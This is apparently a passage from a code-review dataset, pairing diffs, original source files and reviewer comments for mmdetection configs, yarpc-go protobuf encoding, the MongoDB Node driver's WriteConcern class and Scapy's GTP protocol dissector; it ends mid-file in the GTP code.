mask_head=dict( type='FCNMaskHead', num_convs=4, in_channels=256, conv_out_channels=256, num_classes=81, loss_mask=dict( type='CrossEntropyLoss', use_mask=True, loss_weight=1.0))) # model training and testing settings train_cfg = dict( rpn=dict( assigner=dict( type='MaxIoUAssigner', pos_iou_thr=0.7, neg_iou_thr=0.3, min_pos_iou=0.3, ignore_iof_thr=-1), sampler=dict( type='RandomSampler', num=256, pos_fraction=0.5, neg_pos_ub=-1, add_gt_as_proposals=False), allowed_border=0, pos_weight=-1, debug=False), rpn_proposal=dict( nms_across_levels=False, nms_pre=2000, nms_post=2000, max_num=2000, nms_thr=0.7, min_bbox_size=0), rcnn=dict( assigner=dict( type='MaxIoUAssigner', pos_iou_thr=0.5, neg_iou_thr=0.5, min_pos_iou=0.5, ignore_iof_thr=-1), sampler=dict( type='RandomSampler', num=512, pos_fraction=0.25, neg_pos_ub=-1, add_gt_as_proposals=True), mask_size=28, pos_weight=-1, debug=False)) test_cfg = dict( rpn=dict( nms_across_levels=False, nms_pre=1000, nms_post=1000, max_num=1000, nms_thr=0.7, min_bbox_size=0), rcnn=dict( score_thr=0.05, nms=dict(type='nms', iou_thr=0.5), max_per_img=100, mask_thr_binary=0.5)) # dataset settings dataset_type = 'CocoDataset' data_root = 'data/coco/' img_norm_cfg = dict( mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True) albu_train_transforms = [ dict( type='ShiftScaleRotate', shift_limit=0.0625, scale_limit=0.0, rotate_limit=0, interpolation=1, p=0.5), dict( type='RandomBrightnessContrast', brightness_limit=[0.1, 0.3], contrast_limit=[0.1, 0.3], p=0.2), dict( type='OneOf', transforms=[ dict( type='RGBShift', r_shift_limit=10, g_shift_limit=10, b_shift_limit=10, p=1.0), dict( type='HueSaturationValue', hue_shift_limit=20, sat_shift_limit=30, val_shift_limit=20, p=1.0) ], p=0.1), dict(type='JpegCompression', quality_lower=85, quality_upper=95, p=0.2), dict(type='ChannelShuffle', p=0.1), dict( type='OneOf', transforms=[ dict(type='Blur', blur_limit=3, p=1.0), dict(type='MedianBlur', blur_limit=3, p=1.0) ], p=0.1), ] train_pipeline = [ dict(type='LoadImageFromFile'), dict(type='LoadAnnotations', with_bbox=True, with_mask=True), dict(type='Resize', img_scale=(1333, 800), keep_ratio=True), dict(type='Pad', size_divisor=32), dict( type='Albu', transforms=albu_train_transforms, bbox_params=dict( type='BboxParams', format='pascal_voc', label_fields=['gt_labels'], min_visibility=0.0, filter_lost_elements=True), keymap={ 'img': 'image', 'gt_masks': 'masks', 'gt_bboxes': 'bboxes' }, update_pad_shape=False, skip_img_without_anno=True), dict(type='Normalize', **img_norm_cfg), dict(type='DefaultFormatBundle'), dict( type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 'gt_masks'], meta_keys=('filename', 'ori_shape', 'img_shape', 'img_norm_cfg', 'pad_shape', 'scale_factor')) ] test_pipeline = [ dict(type='LoadImageFromFile'), dict( type='MultiScaleFlipAug', img_scale=(1333, 800), flip=False, transforms=[ dict(type='Resize', keep_ratio=True), dict(type='RandomFlip'), dict(type='Normalize', **img_norm_cfg), dict(type='Pad', size_divisor=32), dict(type='ImageToTensor', keys=['img']), dict(type='Collect', keys=['img']), ]) ] data = dict( imgs_per_gpu=2, workers_per_gpu=2, train=dict( type=dataset_type, ann_file=data_root + 'annotations/instances_train2017.json', img_prefix=data_root + 'train2017/', pipeline=train_pipeline), val=dict( type=dataset_type, ann_file=data_root + 'annotations/instances_val2017.json', img_prefix=data_root + 'val2017/', pipeline=test_pipeline), test=dict( type=dataset_type, ann_file=data_root + 'annotations/instances_val2017.json', img_prefix=data_root + 'val2017/', pipeline=test_pipeline)) # optimizer optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001) optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2)) # learning policy lr_config = dict( policy='step', warmup='linear', warmup_iters=500, warmup_ratio=1.0 / 3, step=[8, 11]) checkpoint_config = dict(interval=1) # yapf:disable log_config = dict( interval=50, hooks=[ dict(type='TextLoggerHook'), # dict(type='TensorboardLoggerHook') ]) # yapf:enable evaluation = dict(interval=1) # runtime settings total_epochs = 12 dist_params = dict(backend='nccl') log_level = 'INFO' work_dir = './work_dirs/mask_rcnn_r50_fpn_1x' load_from = None resume_from = None workflow = [('train', 1)]
1
18,332
What is the reason to modify those things? I noticed it breaks the examples using `asyncio`
open-mmlab-mmdetection
py
@@ -33,7 +33,7 @@ import ( const ( // Encoding is the name of this encoding. - Encoding transport.Encoding = "protobuf" + Encoding transport.Encoding = "proto" rawResponseHeaderKey = "rpc-protobuf-raw-response" )
1
// Copyright (c) 2017 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. package protobuf import ( "context" "fmt" "go.uber.org/yarpc" "go.uber.org/yarpc/api/transport" "go.uber.org/yarpc/internal/procedure" "github.com/gogo/protobuf/proto" ) const ( // Encoding is the name of this encoding. Encoding transport.Encoding = "protobuf" rawResponseHeaderKey = "rpc-protobuf-raw-response" ) // SetRawResponse will set rawResponseHeaderKey to "true". // // rawResponseHeaderKey is a header key attached to either a request or // response that signals a UnaryHandler to not encode an application error // inside a wirepb.Response object, instead marshalling the actual response. // // Note per the documentation on transport.Headers#With, the returned Header // may not be the same as the input header, so the caller should always // update the header with: // // header = protobuf.SetRawResponse(header) func SetRawResponse(headers transport.Headers) transport.Headers { return headers.With(rawResponseHeaderKey, "1") } // ***all below functions should only be called by generated code*** // BuildProcedures builds the transport.Procedures. func BuildProcedures( serviceName string, methodNameToUnaryHandler map[string]transport.UnaryHandler, methodNameToOnewayHandler map[string]transport.OnewayHandler, ) []transport.Procedure { procedures := make([]transport.Procedure, 0, len(methodNameToUnaryHandler)) for methodName, unaryHandler := range methodNameToUnaryHandler { procedures = append( procedures, transport.Procedure{ Name: procedure.ToName(serviceName, methodName), HandlerSpec: transport.NewUnaryHandlerSpec(unaryHandler), Encoding: Encoding, }, ) } for methodName, onewayHandler := range methodNameToOnewayHandler { procedures = append( procedures, transport.Procedure{ Name: procedure.ToName(serviceName, methodName), HandlerSpec: transport.NewOnewayHandlerSpec(onewayHandler), Encoding: Encoding, }, ) } return procedures } // Client is a protobuf client. type Client interface { Call( ctx context.Context, requestMethodName string, request proto.Message, newResponse func() proto.Message, options ...yarpc.CallOption, ) (proto.Message, error) CallOneway( ctx context.Context, requestMethodName string, request proto.Message, options ...yarpc.CallOption, ) (transport.Ack, error) } // NewClient creates a new client. func NewClient(serviceName string, clientConfig transport.ClientConfig) Client { return newClient(serviceName, clientConfig) } // NewUnaryHandler returns a new UnaryHandler. func NewUnaryHandler( handle func(context.Context, proto.Message) (proto.Message, error), newRequest func() proto.Message, ) transport.UnaryHandler { return newUnaryHandler(handle, newRequest) } // NewOnewayHandler returns a new OnewayHandler. func NewOnewayHandler( handleOneway func(context.Context, proto.Message) error, newRequest func() proto.Message, ) transport.OnewayHandler { return newOnewayHandler(handleOneway, newRequest) } // CastError returns an error saying that generated code could not properly cast a proto.Message to it's expected type. func CastError(expectedType proto.Message, actualType proto.Message) error { return fmt.Errorf("expected proto.Message to have type %T but had type %T", expectedType, actualType) } func isRawResponse(headers transport.Headers) bool { rawResponse, ok := headers.Get(rawResponseHeaderKey) return ok && rawResponse == "1" } func getRawResponseHeaders() transport.Headers { return SetRawResponse(transport.Headers{}) }
1
13,718
WHOOOOOOOPS! so this is a wire protocol breaking change. I deployed a dev version of yarpc 1.9 to demo-yarpc-go and it caused bad request errors because it couldn't determine the procedure anymore. (in coordination with yarpc-prober)
yarpc-yarpc-go
go
@@ -1,5 +1,9 @@ 'use strict'; +const parseConnectionString = require('./core/uri_parser'); + +const writeConcernKeys = new Set(['w', 'wtimeout', 'j', 'fsync', 'wtimeoutMS', 'journal']); + /** * The **WriteConcern** class is a class that represents a MongoDB WriteConcern. * @class
1
'use strict'; /** * The **WriteConcern** class is a class that represents a MongoDB WriteConcern. * @class * @property {(number|string)} w The write concern * @property {number} wtimeout The write concern timeout * @property {boolean} j The journal write concern * @property {boolean} fsync The file sync write concern * @see https://docs.mongodb.com/manual/reference/write-concern/index.html */ class WriteConcern { /** * Constructs a WriteConcern from the write concern properties. * @param {(number|string)} [w] The write concern * @param {number} [wtimeout] The write concern timeout * @param {boolean} [j] The journal write concern * @param {boolean} [fsync] The file sync write concern */ constructor(w, wtimeout, j, fsync) { if (w != null) { this.w = w; } if (wtimeout != null) { this.wtimeout = wtimeout; } if (j != null) { this.j = j; } if (fsync != null) { this.fsync = fsync; } } /** * Construct a WriteConcern given an options object. * * @param {object} options The options object from which to extract the write concern. * @return {WriteConcern} */ static fromOptions(options) { if ( options == null || (options.writeConcern == null && options.w == null && options.wtimeout == null && options.j == null && options.fsync == null) ) { return; } if (options.writeConcern) { return new WriteConcern( options.writeConcern.w, options.writeConcern.wtimeout, options.writeConcern.j, options.writeConcern.fsync ); } return new WriteConcern(options.w, options.wtimeout, options.j, options.fsync); } } module.exports = WriteConcern;
1
16,463
if we keep this, can we stick to our convention of using UPPER_CASE for constants? Otherwise this looks like a floating variable to me.
mongodb-node-mongodb-native
js
@@ -341,7 +341,7 @@ class GTPPDUSessionContainer(Packet): return p def hashret(self): - return struct.pack("H", self.seq) + return struct.pack("H", getattr(self.underlayer, "seq")) class GTPEchoRequest(Packet):
1
# Copyright (C) 2018 Leonardo Monteiro <[email protected]> # 2017 Alexis Sultan <[email protected]> # 2017 Alessio Deiana <[email protected]> # 2014 Guillaume Valadon <[email protected]> # 2012 ffranz <[email protected]> ## # This program is published under a GPLv2 license # scapy.contrib.description = GPRS Tunneling Protocol (GTP) # scapy.contrib.status = loads from __future__ import absolute_import import struct from scapy.compat import chb, orb, bytes_encode from scapy.config import conf from scapy.error import warning from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ ConditionalField, FieldLenField, FieldListField, FlagsField, IntField, \ IPField, PacketListField, ShortField, StrFixedLenField, StrLenField, \ XBitField, XByteField, XIntField from scapy.layers.inet import IP, UDP from scapy.layers.inet6 import IPv6, IP6Field from scapy.layers.ppp import PPP from scapy.modules.six.moves import range from scapy.packet import bind_layers, bind_bottom_up, bind_top_down, \ Packet, Raw from scapy.volatile import RandInt, RandIP, RandNum, RandString # GTP Data types RATType = { 1: "UTRAN", 2: "GETRAN", 3: "WLAN", 4: "GAN", 5: "HSPA" } GTPmessageType = {1: "echo_request", 2: "echo_response", 16: "create_pdp_context_req", 17: "create_pdp_context_res", 18: "update_pdp_context_req", 19: "update_pdp_context_resp", 20: "delete_pdp_context_req", 21: "delete_pdp_context_res", 26: "error_indication", 27: "pdu_notification_req", 31: "supported_extension_headers_notification", 254: "end_marker", 255: "g_pdu"} IEType = {1: "Cause", 2: "IMSI", 3: "RAI", 4: "TLLI", 5: "P_TMSI", 8: "IE_ReorderingRequired", 14: "Recovery", 15: "SelectionMode", 16: "TEIDI", 17: "TEICP", 19: "TeardownInd", 20: "NSAPI", 26: "ChargingChrt", 27: "TraceReference", 28: "TraceType", 127: "ChargingId", 128: "EndUserAddress", 131: "AccessPointName", 132: "ProtocolConfigurationOptions", 133: "GSNAddress", 134: "MSInternationalNumber", 135: "QoS", 148: "CommonFlags", 149: "APNRestriction", 151: "RatType", 152: "UserLocationInformation", 153: "MSTimeZone", 154: "IMEI", 181: "MSInfoChangeReportingAction", 184: "BearerControlMode", 191: "EvolvedAllocationRetentionPriority", 255: "PrivateExtention"} CauseValues = {0: "Request IMSI", 1: "Request IMEI", 2: "Request IMSI and IMEI", 3: "No identity needed", 4: "MS Refuses", 5: "MS is not GPRS Responding", 128: "Request accepted", 129: "New PDP type due to network preference", 130: "New PDP type due to single address bearer only", 192: "Non-existent", 193: "Invalid message format", 194: "IMSI not known", 195: "MS is GPRS Detached", 196: "MS is not GPRS Responding", 197: "MS Refuses", 198: "Version not supported", 199: "No resources available", 200: "Service not supported", 201: "Mandatory IE incorrect", 202: "Mandatory IE missing", 203: "Optional IE incorrect", 204: "System failure", 205: "Roaming restriction", 206: "P-TMSI Signature mismatch", 207: "GPRS connection suspended", 208: "Authentication failure", 209: "User authentication failed", 210: "Context not found", 211: "All dynamic PDP addresses are occupied", 212: "No memory is available", 213: "Reallocation failure", 214: "Unknown mandatory extension header", 215: "Semantic error in the TFT operation", 216: "Syntactic error in TFT operation", 217: "Semantic errors in packet filter(s)", 218: "Syntactic errors in packet filter(s)", 219: "Missing or unknown APN", 220: "Unknown PDP address or PDP type", 221: "PDP context without TFT already activated", 222: "APN access denied : no subscription", 223: "APN Restriction type incompatibility with currently active PDP Contexts", # noqa: E501 224: "MS MBMS Capabilities Insufficient", 225: "Invalid Correlation : ID", 226: "MBMS Bearer Context Superseded", 227: "Bearer Control Mode violation", 228: "Collision with network initiated request"} Selection_Mode = {11111100: "MS or APN", 11111101: "MS", 11111110: "NET", 11111111: "FutureUse"} TrueFalse_value = {254: "False", 255: "True"} # http://www.arib.or.jp/IMT-2000/V720Mar09/5_Appendix/Rel8/29/29281-800.pdf ExtensionHeadersTypes = { 0: "No more extension headers", 1: "Reserved", 2: "Reserved", 64: "UDP Port", 133: "PDU Session Container", 192: "PDCP PDU Number", 193: "Reserved", 194: "Reserved" } class TBCDByteField(StrFixedLenField): def i2h(self, pkt, val): return val def m2i(self, pkt, val): ret = [] for v in val: byte = orb(v) left = byte >> 4 right = byte & 0xf if left == 0xf: ret.append(TBCD_TO_ASCII[right:right + 1]) else: ret += [ TBCD_TO_ASCII[right:right + 1], TBCD_TO_ASCII[left:left + 1] ] return b"".join(ret) def i2m(self, pkt, val): if not isinstance(val, bytes): val = bytes_encode(val) ret_string = b"" for i in range(0, len(val), 2): tmp = val[i:i + 2] if len(tmp) == 2: ret_string += chb(int(tmp[::-1], 16)) else: ret_string += chb(int(b"F" + tmp[:1], 16)) return ret_string TBCD_TO_ASCII = b"0123456789*#abc" class GTP_ExtensionHeader(Packet): @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt is None: return GTP_UDPPort_ExtensionHeader return cls class GTP_UDPPort_ExtensionHeader(GTP_ExtensionHeader): fields_desc = [ByteField("length", 0x40), ShortField("udp_port", None), ByteEnumField("next_ex", 0, ExtensionHeadersTypes), ] class GTP_PDCP_PDU_ExtensionHeader(GTP_ExtensionHeader): fields_desc = [ByteField("length", 0x01), ShortField("pdcp_pdu", None), ByteEnumField("next_ex", 0, ExtensionHeadersTypes), ] class GTPHeader(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP-C Header" fields_desc = [BitField("version", 1, 3), BitField("PT", 1, 1), BitField("reserved", 0, 1), BitField("E", 0, 1), BitField("S", 0, 1), BitField("PN", 0, 1), ByteEnumField("gtp_type", None, GTPmessageType), ShortField("length", None), IntField("teid", 0), ConditionalField(XBitField("seq", 0, 16), lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), # noqa: E501 ConditionalField(ByteField("npdu", 0), lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), # noqa: E501 ConditionalField(ByteEnumField("next_ex", 0, ExtensionHeadersTypes), lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), ] # noqa: E501 def post_build(self, p, pay): p += pay if self.length is None: tmp_len = len(p) - 8 p = p[:2] + struct.pack("!H", tmp_len) + p[4:] return p def hashret(self): return struct.pack("B", self.version) + self.payload.hashret() def answers(self, other): return (isinstance(other, GTPHeader) and self.version == other.version and self.payload.answers(other.payload)) @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt and len(_pkt) >= 1: if (orb(_pkt[0]) >> 5) & 0x7 == 2: from . import gtp_v2 return gtp_v2.GTPHeader if _pkt and len(_pkt) >= 8: _gtp_type = orb(_pkt[1:2]) return GTPforcedTypes.get(_gtp_type, GTPHeader) return cls class GTP_U_Header(GTPHeader): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP-U Header" # GTP-U protocol is used to transmit T-PDUs between GSN pairs (or between an SGSN and an RNC in UMTS), # noqa: E501 # encapsulated in G-PDUs. A G-PDU is a packet including a GTP-U header and a T-PDU. The Path Protocol # noqa: E501 # defines the path and the GTP-U header defines the tunnel. Several tunnels may be multiplexed on a single path. # noqa: E501 def guess_payload_class(self, payload): # Snooped from Wireshark # https://github.com/boundary/wireshark/blob/07eade8124fd1d5386161591b52e177ee6ea849f/epan/dissectors/packet-gtp.c#L8195 # noqa: E501 if self.E == 1: if self.next_ex == 0x85: return GTPPDUSessionContainer return GTPHeader.guess_payload_class(self, payload) if self.gtp_type == 255: sub_proto = orb(payload[0]) if sub_proto >= 0x45 and sub_proto <= 0x4e: return IP elif (sub_proto & 0xf0) == 0x60: return IPv6 else: return PPP return GTPHeader.guess_payload_class(self, payload) # Some gtp_types have to be associated with a certain type of header GTPforcedTypes = { 16: GTPHeader, 17: GTPHeader, 18: GTPHeader, 19: GTPHeader, 20: GTPHeader, 21: GTPHeader, 26: GTP_U_Header, 27: GTPHeader, 254: GTP_U_Header, 255: GTP_U_Header } class GTPPDUSessionContainer(Packet): name = "GTP PDU Session Container" fields_desc = [ByteField("ExtHdrLen", None), BitField("type", 0, 4), BitField("spare1", 0, 4), BitField("P", 0, 1), BitField("R", 0, 1), BitField("QFI", 0, 6), ConditionalField(XBitField("PPI", 0, 3), lambda pkt: pkt.P == 1), ConditionalField(XBitField("spare2", 0, 5), lambda pkt: pkt.P == 1), ConditionalField(ByteField("pad1", 0), lambda pkt: pkt.P == 1), ConditionalField(ByteField("pad2", 0), lambda pkt: pkt.P == 1), ConditionalField(ByteField("pad3", 0), lambda pkt: pkt.P == 1), ConditionalField(StrLenField( "extraPadding", "", length_from=lambda pkt: 4 * (pkt.ExtHdrLen) - 4), lambda pkt: pkt.ExtHdrLen and pkt.ExtHdrLen > 1), ByteEnumField("NextExtHdr", 0, ExtensionHeadersTypes), ] def guess_payload_class(self, payload): if self.NextExtHdr == 0: sub_proto = orb(payload[0]) if sub_proto >= 0x45 and sub_proto <= 0x4e: return IP elif (sub_proto & 0xf0) == 0x60: return IPv6 else: return PPP return GTPHeader.guess_payload_class(self, payload) def post_build(self, p, pay): p += pay if self.ExtHdrLen is None: if self.P == 1: hdr_len = 2 else: hdr_len = 1 p = struct.pack("!B", hdr_len) + p[1:] return p def hashret(self): return struct.pack("H", self.seq) class GTPEchoRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Echo Request" def hashret(self): return struct.pack("H", self.seq) class IE_Base(Packet): def extract_padding(self, pkt): return "", pkt def post_build(self, p, pay): if self.fields_desc[1].name == "length": if self.length is None: tmp_len = len(p) if isinstance(self.payload, conf.padding_layer): tmp_len += len(self.payload.load) p = p[:1] + struct.pack("!H", tmp_len - 2) + p[3:] return p + pay class IE_Cause(IE_Base): name = "Cause" fields_desc = [ByteEnumField("ietype", 1, IEType), ByteEnumField("CauseValue", None, CauseValues)] class IE_IMSI(IE_Base): name = "IMSI - Subscriber identity of the MS" fields_desc = [ByteEnumField("ietype", 2, IEType), TBCDByteField("imsi", str(RandNum(0, 999999999999999)), 8)] class IE_Routing(IE_Base): name = "Routing Area Identity" fields_desc = [ByteEnumField("ietype", 3, IEType), TBCDByteField("MCC", "", 2), # MNC: if the third digit of MCC is 0xf, # then the length of MNC is 1 byte TBCDByteField("MNC", "", 1), ShortField("LAC", None), ByteField("RAC", None)] class IE_ReorderingRequired(IE_Base): name = "Recovery" fields_desc = [ByteEnumField("ietype", 8, IEType), ByteEnumField("reordering_required", 254, TrueFalse_value)] class IE_Recovery(IE_Base): name = "Recovery" fields_desc = [ByteEnumField("ietype", 14, IEType), ByteField("restart_counter", 24)] class IE_SelectionMode(IE_Base): # Indicates the origin of the APN in the message name = "Selection Mode" fields_desc = [ByteEnumField("ietype", 15, IEType), BitEnumField("SelectionMode", "MS or APN", 8, Selection_Mode)] class IE_TEIDI(IE_Base): name = "Tunnel Endpoint Identifier Data" fields_desc = [ByteEnumField("ietype", 16, IEType), XIntField("TEIDI", RandInt())] class IE_TEICP(IE_Base): name = "Tunnel Endpoint Identifier Control Plane" fields_desc = [ByteEnumField("ietype", 17, IEType), XIntField("TEICI", RandInt())] class IE_Teardown(IE_Base): name = "Teardown Indicator" fields_desc = [ByteEnumField("ietype", 19, IEType), ByteEnumField("indicator", "True", TrueFalse_value)] class IE_NSAPI(IE_Base): # Identifies a PDP context in a mobility management context specified by TEICP # noqa: E501 name = "NSAPI" fields_desc = [ByteEnumField("ietype", 20, IEType), XBitField("sparebits", 0x0000, 4), XBitField("NSAPI", RandNum(0, 15), 4)] class IE_ChargingCharacteristics(IE_Base): # Way of informing both the SGSN and GGSN of the rules for name = "Charging Characteristics" fields_desc = [ByteEnumField("ietype", 26, IEType), # producing charging information based on operator configured triggers. # noqa: E501 # 0000 .... .... .... : spare # .... 1... .... .... : normal charging # .... .0.. .... .... : prepaid charging # .... ..0. .... .... : flat rate charging # .... ...0 .... .... : hot billing charging # .... .... 0000 0000 : reserved XBitField("Ch_ChSpare", None, 4), XBitField("normal_charging", None, 1), XBitField("prepaid_charging", None, 1), XBitField("flat_rate_charging", None, 1), XBitField("hot_billing_charging", None, 1), XBitField("Ch_ChReserved", 0, 8)] class IE_TraceReference(IE_Base): # Identifies a record or a collection of records for a particular trace. name = "Trace Reference" fields_desc = [ByteEnumField("ietype", 27, IEType), XBitField("Trace_reference", None, 16)] class IE_TraceType(IE_Base): # Indicates the type of the trace name = "Trace Type" fields_desc = [ByteEnumField("ietype", 28, IEType), XBitField("Trace_type", None, 16)] class IE_ChargingId(IE_Base): name = "Charging ID" fields_desc = [ByteEnumField("ietype", 127, IEType), XIntField("Charging_id", RandInt())] class IE_EndUserAddress(IE_Base): # Supply protocol specific information of the external packet name = "End User Address" fields_desc = [ByteEnumField("ietype", 128, IEType), # data network accessed by the GGPRS subscribers. # - Request # 1 Type (1byte) # 2-3 Length (2bytes) - value 2 # 4 Spare + PDP Type Organization # 5 PDP Type Number # - Response # 6-n PDP Address ShortField("length", 2), BitField("SPARE", 15, 4), BitField("PDPTypeOrganization", 1, 4), XByteField("PDPTypeNumber", None), ConditionalField(IPField("PDPAddress", RandIP()), lambda pkt: pkt.length == 6 or pkt.length == 22), # noqa: E501 ConditionalField(IP6Field("IPv6_PDPAddress", '::1'), lambda pkt: pkt.length == 18 or pkt.length == 22)] # noqa: E501 class APNStrLenField(StrLenField): # Inspired by DNSStrField def m2i(self, pkt, s): ret_s = b"" tmp_s = s while tmp_s: tmp_len = orb(tmp_s[0]) + 1 if tmp_len > len(tmp_s): warning("APN prematured end of character-string (size=%i, remaining bytes=%i)" % (tmp_len, len(tmp_s))) # noqa: E501 ret_s += tmp_s[1:tmp_len] tmp_s = tmp_s[tmp_len:] if len(tmp_s): ret_s += b"." s = ret_s return s def i2m(self, pkt, s): if not isinstance(s, bytes): s = bytes_encode(s) s = b"".join(chb(len(x)) + x for x in s.split(b".")) return s class IE_AccessPointName(IE_Base): # Sent by SGSN or by GGSN as defined in 3GPP TS 23.060 name = "Access Point Name" fields_desc = [ByteEnumField("ietype", 131, IEType), ShortField("length", None), APNStrLenField("APN", "nternet", length_from=lambda x: x.length)] # noqa: E501 def post_build(self, p, pay): if self.length is None: tmp_len = len(p) - 3 p = p[:2] + struct.pack("!B", tmp_len) + p[3:] return p class IE_ProtocolConfigurationOptions(IE_Base): name = "Protocol Configuration Options" fields_desc = [ByteEnumField("ietype", 132, IEType), ShortField("length", 4), StrLenField("Protocol_Configuration", "", length_from=lambda x: x.length)] class IE_GSNAddress(IE_Base): name = "GSN Address" fields_desc = [ByteEnumField("ietype", 133, IEType), ShortField("length", None), ConditionalField(IPField("ipv4_address", RandIP()), lambda pkt: pkt.length == 4), ConditionalField(IP6Field("ipv6_address", '::1'), lambda pkt: pkt.length == 16)] def post_build(self, p, pay): if self.length is None: tmp_len = len(p) - 3 p = p[:2] + struct.pack("!B", tmp_len) + p[3:] return p class IE_MSInternationalNumber(IE_Base): name = "MS International Number" fields_desc = [ByteEnumField("ietype", 134, IEType), ShortField("length", None), FlagsField("flags", 0x91, 8, ["Extension", "", "", "International Number", "", "", "", "ISDN numbering"]), # noqa: E501 TBCDByteField("digits", "33607080910", length_from=lambda x: x.length - 1)] # noqa: E501 class QoS_Profile(IE_Base): name = "QoS profile" fields_desc = [ByteField("qos_ei", 0), ByteField("length", None), XBitField("spare", 0x00, 2), XBitField("delay_class", 0x000, 3), XBitField("reliability_class", 0x000, 3), XBitField("peak_troughput", 0x0000, 4), BitField("spare", 0, 1), XBitField("precedence_class", 0x000, 3), XBitField("spare", 0x000, 3), XBitField("mean_troughput", 0x00000, 5), XBitField("traffic_class", 0x000, 3), XBitField("delivery_order", 0x00, 2), XBitField("delivery_of_err_sdu", 0x000, 3), ByteField("max_sdu_size", None), ByteField("max_bitrate_up", None), ByteField("max_bitrate_down", None), XBitField("redidual_ber", 0x0000, 4), XBitField("sdu_err_ratio", 0x0000, 4), XBitField("transfer_delay", 0x00000, 5), XBitField("traffic_handling_prio", 0x000, 3), ByteField("guaranteed_bit_rate_up", None), ByteField("guaranteed_bit_rate_down", None)] class IE_QoS(IE_Base): name = "QoS" fields_desc = [ByteEnumField("ietype", 135, IEType), ShortField("length", None), ByteField("allocation_retention_prioiry", 1), ConditionalField(XBitField("spare", 0x00, 2), lambda p: p.length and p.length > 1), ConditionalField(XBitField("delay_class", 0x000, 3), lambda p: p.length and p.length > 1), ConditionalField(XBitField("reliability_class", 0x000, 3), lambda p: p.length and p.length > 1), ConditionalField(XBitField("peak_troughput", 0x0000, 4), lambda p: p.length and p.length > 2), ConditionalField(BitField("spare", 0, 1), lambda p: p.length and p.length > 2), ConditionalField(XBitField("precedence_class", 0x000, 3), lambda p: p.length and p.length > 2), ConditionalField(XBitField("spare", 0x000, 3), lambda p: p.length and p.length > 3), ConditionalField(XBitField("mean_troughput", 0x00000, 5), lambda p: p.length and p.length > 3), ConditionalField(XBitField("traffic_class", 0x000, 3), lambda p: p.length and p.length > 4), ConditionalField(XBitField("delivery_order", 0x00, 2), lambda p: p.length and p.length > 4), ConditionalField(XBitField("delivery_of_err_sdu", 0x000, 3), lambda p: p.length and p.length > 4), ConditionalField(ByteField("max_sdu_size", None), lambda p: p.length and p.length > 5), ConditionalField(ByteField("max_bitrate_up", None), lambda p: p.length and p.length > 6), ConditionalField(ByteField("max_bitrate_down", None), lambda p: p.length and p.length > 7), ConditionalField(XBitField("redidual_ber", 0x0000, 4), lambda p: p.length and p.length > 8), ConditionalField(XBitField("sdu_err_ratio", 0x0000, 4), lambda p: p.length and p.length > 8), ConditionalField(XBitField("transfer_delay", 0x00000, 6), lambda p: p.length and p.length > 9), ConditionalField(XBitField("traffic_handling_prio", 0x000, 2), lambda p: p.length and p.length > 9), ConditionalField(ByteField("guaranteed_bit_rate_up", None), lambda p: p.length and p.length > 10), ConditionalField(ByteField("guaranteed_bit_rate_down", None), lambda p: p.length and p.length > 11), ConditionalField(XBitField("spare", 0x000, 3), lambda p: p.length and p.length > 12), ConditionalField(BitField("signaling_indication", 0, 1), lambda p: p.length and p.length > 12), ConditionalField(XBitField("source_stats_desc", 0x0000, 4), lambda p: p.length and p.length > 12), ConditionalField(ByteField("max_bitrate_down_ext", None), lambda p: p.length and p.length > 13), ConditionalField(ByteField("guaranteed_bitrate_down_ext", None), lambda p: p.length and p.length > 14), ConditionalField(ByteField("max_bitrate_up_ext", None), lambda p: p.length and p.length > 15), ConditionalField(ByteField("guaranteed_bitrate_up_ext", None), lambda p: p.length and p.length > 16), ConditionalField(ByteField("max_bitrate_down_ext2", None), lambda p: p.length and p.length > 17), ConditionalField(ByteField("guaranteed_bitrate_down_ext2", None), lambda p: p.length and p.length > 18), ConditionalField(ByteField("max_bitrate_up_ext2", None), lambda p: p.length and p.length > 19), ConditionalField(ByteField("guaranteed_bitrate_up_ext2", None), lambda p: p.length and p.length > 20)] class IE_CommonFlags(IE_Base): name = "Common Flags" fields_desc = [ByteEnumField("ietype", 148, IEType), ShortField("length", None), BitField("dual_addr_bearer_fl", 0, 1), BitField("upgrade_qos_supported", 0, 1), BitField("nrsn", 0, 1), BitField("no_qos_nego", 0, 1), BitField("mbms_cnting_info", 0, 1), BitField("ran_procedure_ready", 0, 1), BitField("mbms_service_type", 0, 1), BitField("prohibit_payload_compression", 0, 1)] class IE_APNRestriction(IE_Base): name = "APN Restriction" fields_desc = [ByteEnumField("ietype", 149, IEType), ShortField("length", 1), ByteField("restriction_type_value", 0)] class IE_RATType(IE_Base): name = "Rat Type" fields_desc = [ByteEnumField("ietype", 151, IEType), ShortField("length", 1), ByteEnumField("RAT_Type", None, RATType)] class IE_UserLocationInformation(IE_Base): name = "User Location Information" fields_desc = [ByteEnumField("ietype", 152, IEType), ShortField("length", None), ByteField("type", 1), # Only type 